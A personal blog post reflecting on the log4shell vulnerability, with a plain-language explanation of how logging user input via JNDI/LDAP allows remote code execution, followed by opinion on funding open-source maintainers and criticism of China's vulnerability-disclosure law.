Into week 3 of what will certainly be a years-long event around this log4shell vulnerability. Some thoughts.
Ok, what is log4shell?
If you are not technically-inclined, please bear with me. I will keep this straightforward! Log4shell is a vulnerability in the log4j logging library.
From the Wikipedia entry of Log4j:
Log4j is an open source logging framework that allows software developers to log data within their applications. This data can include user input.
Emphasis mine. Logging is really important in software development. It helps identify bugs and the root cause of many problems users face. For the purpose of keeping this explanation very simple, I will give a hand-wavy explanation of:
JNDI == a technology which turns shorthand expressions into valuable data. For example, I might want to know what version of the software was running as part of my log. I write {version} into my logging code, and it prints out the software version. Handy! The critical piece here is that JNDI is running code to turn version into something like Java 1.9 in your log.
LDAP == similar to writing google.com into your web browser, this technology allows the main application to retrieve data from some external source, elsewhere on the network/internet.
The log4shell vulnerability came from several good intentions that combined to produce a bad outcome.
- Logging user input. Sometimes bugs happen because of what a user types into the software!
- Running code fetched remotely. In the exploit case, running a random Java object which is fetched from an LDAP server.
This is how the problem of log4shell comes to be. If we write user input to the log, and the logging software can run commands, and the user input is itself a command - our log is going to run the command that a user types in! Malicious users can figure out how to craft special input so that our log runs code on a remote server on the internet that we (the owner’s of this application) do not control.
Open Source, and it’s costs
I am a major proponent of open source; the idea that software can be freely shared through it’s source code. I run other’s code on my home network all the time - Paperless-NG, Wiki.js, etc. The idea that a person or group can build something they are passionate about and share that idea with the world, allowing the world to modify and improve it over time, is a core principle of what makes the Internet special and unique. Human collaboration is the magic potion that created the world as we know it today! We’ve built bridges, buildings, and monument by working together. Open Source is the software equivalent.
But in times like this, the costs become readily apparent. From Yawar Amin:
They [the log4j maintainers] worked liked a professional team of security-focused engineers, except with zero pay or recognition. They gave up a weekend with their families to do this for almost the entire internet. They were criticized and harassed, and their every action scrutinized:
Tweet: Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren’t paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
Despite the license attached to the log4j open source library being explicit in stating:
Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
It is 100% understandable that those who built log4j would feel compelled to correct this problem. It is 1,000% wrong that those who freely took the log4j library did not support the log4j maintainers now in this time of crisis, or in the past. The number of impacted large enterprise could have all banded together and donated a few engineers to solving this problem alongside the log4j crew. Expecting the group of people who maintain their passion-project to jump on issues instantly is unfair to those individuals. Open Source should be about community.
Funding open source projects and their maintainers is a problem and the current incarnation we’re seeing with log4j reminds me of the npm fund debacle from a few years back. We all agree that open source is a good thing; we can’t seem to figure out how to pay for it, though there is plenty of opportunity. See also this.
And then there’s China
This is not great:
China’s internet security regulator has disciplined Alibaba Group Holding’s cloud computing services unit for failing to first report to the government a critical vulnerability in Apache’s Log4j software that has alarmed the cybersecurity community, Chinese media reported on Wednesday.
[…]
Notifying vendors first about security flaws is a cybersecurity industry norm, but a new law encourages Chinese companies to first notify the government
If you look at a problem and think to yourself “how could I create the greatest benefit for myself in this situation?” - well, that’s what China is doing here. They are saying to hell with everyone else in this world, we’re going to unilaterally do the things that most benefit our desires to spy on the rest of the world.
Certainly no nation-state has perfectly clean hands in this, but it feels like a step over some invisible red line to pass a law which tells companies they must disclose vulnerabilities first to their government and then, perhaps only if the government allows them, they can responsibly disclose the vulnerability to the group which has the power to fix it. This is not making the internet safer!
Conclusion
Pay for your tools. Fund open source. Respect maintainers (you know, the people who gave you this awesome thing for free).
And avoid doing business in China, apparently.